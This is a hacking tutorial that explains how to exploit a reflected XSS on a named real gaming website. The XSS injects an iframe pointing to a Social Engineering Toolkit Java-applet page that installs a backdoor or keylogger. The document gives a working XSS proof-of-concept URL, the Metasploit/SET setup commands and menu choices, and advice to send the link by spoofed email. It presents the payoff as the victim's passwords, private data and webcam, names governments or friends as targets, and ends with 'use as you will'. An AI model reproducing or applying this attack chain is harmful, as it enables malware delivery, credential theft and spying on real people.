Targeted attacks via non-persistant xss by speakeasy

Targeted attacks via non-persistant xss
by speakeasy
 
non-persistant XSS attacks can be an extremely effective way to completely take control of a website or server. They are effective because they exploit a weak factor that is present in *every* system - people.
 
This tutorial should give you an introduction to using non persistant xss for targeted attacks, whether it's for attacking goverment organisations, or fucking with your best friend.
 
What you will need:
 
A server with the metasploit framework
The social engineering toolkit also on that server
an apache webserver on that server
a backdoor in an exe format
ssh client (I recommend putty for windows)
sftp client (I recommend filezilla)
common sense
 
 
STEP 1
 
The first thing we need to do is know our victum. Know what he likes and what he dislikes. Know his formal and informal relationships. Know hwho he trusts and distrusts. The process of finding this information is a skill in itself, and there are a number of good tutorials on it.
 
now we need to find a site that we can trick them into visiting, that's vulnerable to an xss. make a list of sites and then copy this string into the search box:
 
“>
 
i searched for "games" in google, and found an xss in my second site, http://www.addictinggames.com . Unfortunately most browsers filter this, but you should see a warning notice in internet explorer if you are successful,
which can be shown using the url:
 
http://www.addictinggames.com/static/php/game/searchPage.php?pageAction=search&text=%E2%80%9C%3E%3Cscript%3Ealert%28%E2%80%98xss_here%E2%80%99%29%3B%3C%2Fscript%3E
 
or this screenshot in case it has been fixed:
 
http://i.imgur.com/rKDLr.png
 
Now the problem here his that browsers try to block the scripts we add to prevent cookie theft, but there is an easy way around that: don't use scripts at all!
 
STEP 2
 
I bet you were wondering why we needed that web server, well it's critical to this attack (unless you're attacking someone on your own network)
 
install the metasploit framework and the social engineering toolkit on your server, then ssh in. on my ubuntu server, i can install metasploit with the binary installer like this:
 
wget http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run
chmod +x framework-3.7.2-linux-x64-full.run
sudo ./framework-3.7.2-linux-x64-full.run
 
(remeber to use the version appropriate to your system)
via subversion using:
 
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET/
 
and run it using:
 
python set
 
although we may need to install python using apt-get install python
 
now that this is set up it's time to get on with the attack. Run the social engineering framework and select:
2.  Website Attack Vectors
followed by:
1. The Java Applet Attack Method
then:
1. Web Templates
and finally:
1. Java Required
 
and any options you want for creating your metasploit payload, we won't be using it for this tutorial. if you get the error:
[!] Metasploit path not found. Enter path to framework directory:
then you will need to enter the path to the directory where you installed metaploit, and the config file should be automatically updated.
 
there are a couple of things we need to change now, so login with your sftp client.
cd to your webservers root directory (should be /var/www in apache)
edit the index.html file being careful not to ruin the important code, this should be fairly obvious.
in this case we can change the background, fonts and text to make it seem like a game should be here.but requires java, but i will leave mine as it is for this tutorial. The second thing we need to do is change the payload. in apache's root directory there should be a file with a random string of letters. we need to upload our payload (backdoor, keylogger etc) and replace the file on the server with our payload. For this tutorial i will use an exe that pops up a message box saying "you got pwnd" i can visit the site and allow java to get this:
 
http://i.imgur.com/CyHw5.png
 
STEP 3
 
this is where we combine what we have so far. We will use xss to add an iframe into our target page. ">
you can either make the iframe the correct size for a game or map, or you can make it invisible, there is plenty of information about this on the internet.
 
now, enter your iframe code into the server box and copy and paste the link in the top bar
send it to the target via a spoofed email, or pass it to them in conversation.
 
the finished result should have no trouble tricking a user who sees and trusts the sites url especially considering the number of windows we click through without even looking: http://i.imgur.com/ukDzD.png
 
STEP 4:
 
if you installed something good on their computer you now have access to all of their password and private information, as well as their webcam ;), and they probably recently gained a large collection of questionaable pornography.
 
use as you will,
good luck.
 
  _______                       __    
 |   _   |.-----..-----..---.-.|  |--.
 |   1___||  _  ||  -__||  _  ||    <
 |____   ||   __||_____||___._||__|__|
 |:  1   ||__|                        
 |::.. . |      _.._..,_,_                      
 `-------'     (          )
                ]~,"-.-~~[
              .=])' (;  ([
              | ]:: '    [
              '=]): .)  ([
                |:: '    |
                 ~~----~~